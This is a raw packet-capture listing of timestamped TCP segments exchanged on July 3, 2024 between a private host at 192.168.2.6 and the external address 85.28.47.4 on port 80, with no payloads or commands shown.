Jul 3, 2024 18:08:24.503712893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503730059 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503796101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503806114 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503814936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503819942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503833055 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503856897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503879070 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503916025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503926992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503931999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503942013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503959894 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503985882 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.504189968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504249096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.504256010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504266024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504271030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504300117 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.504328012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.504431963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504441977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504451036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504456043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504461050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504471064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504476070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504492044 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.504523039 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.504614115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504623890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504633904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504643917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504648924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.504653931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.504679918 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.504708052 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.504981995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.505031109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.505034924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.505045891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.505068064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.505073071 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.505079031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.505096912 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.505114079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.505121946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.573540926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.573555946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.573568106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.573625088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.573637009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.573647976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.573657036 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.573661089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.573714018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.573714018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.573985100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.573997021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.574007988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.574018002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.574028969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.574039936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.574045897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.574050903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.574062109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.574069023 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.574074030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.574099064 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.574122906 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.582365036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.582425117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.582427025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.582437038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.582465887 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.582478046 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.582528114 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.582540035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.582550049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.582560062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.582570076 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.582581043 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.582608938 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586046934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586091995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586102962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586105108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586133003 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586160898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586173058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586210012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586236000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586247921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586262941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586277962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586303949 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586338043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586348057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586360931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586378098 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586476088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586487055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586504936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586519957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586524010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586534977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586536884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586565018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586577892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586662054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586673975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586683035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586694002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586704969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586714029 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586735010 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586745977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586869955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586882114 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586925983 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586930990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586941957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586951971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586962938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586973906 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.586973906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.586990118 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.587017059 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.587059975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.587102890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.587282896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.587294102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.587304115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.587330103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.587358952 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.587383032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.587393999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.587404013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.587433100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.587444067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.587446928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.587455988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.587483883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.587491989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.591438055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591494083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591506004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591506004 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.591557026 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.591574907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591584921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591594934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591604948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591629028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.591648102 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.591717005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591727972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591737986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591749907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591851950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591862917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591873884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591885090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.591896057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592004061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592006922 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592045069 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592062950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592073917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592091084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592099905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592108011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592166901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592178106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592199087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592219114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592231989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592245102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592266083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592277050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592283010 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592303991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592329025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592339993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592350960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592369080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592381954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592453003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592463017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592473984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592490911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592495918 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592530012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592590094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592601061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592612028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592622995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592633963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592659950 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592736006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592778921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592782021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592789888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592825890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.592886925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592897892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592909098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.592920065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593010902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593020916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593030930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593039989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593183994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593194008 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.593194962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593206882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593219995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593230963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.593249083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.593264103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593276024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593276978 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.593286037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593297005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.593310118 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.593338013 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.662484884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662545919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662555933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662566900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662579060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662589073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662600040 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662636995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.662682056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662688017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.662694931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662705898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662718058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662729025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662739038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.662743092 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.662775040 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.663140059 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.663252115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.663264990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.663314104 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.671113014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.671124935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.671135902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.671180964 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.671205997 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.671267986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.671284914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.671295881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.671307087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.671329021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.671360016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.674824953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.674856901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.674866915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.674880981 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.674907923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675004959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675015926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675024986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675035954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675055981 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675075054 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675121069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675132036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675142050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675153017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675168037 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675185919 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675246000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675256968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675266981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675276041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675299883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675312996 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675395012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675405025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675415993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675426006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675445080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675473928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675534010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675579071 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675600052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675616026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675626993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675651073 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675662994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675729990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675740957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675750017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675767899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675780058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675781012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675790071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675798893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675834894 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675929070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675940037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675950050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675978899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.675991058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.675997019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.676035881 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.676047087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.676059961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.676070929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.676080942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.676098108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.676126957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680063963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680114985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680119038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680126905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680155993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680157900 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680191040 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680459023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680510044 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680525064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680536032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680557013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680572987 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680598974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680660963 CEST	80	49710	85.28.47.4	192.168.2.6
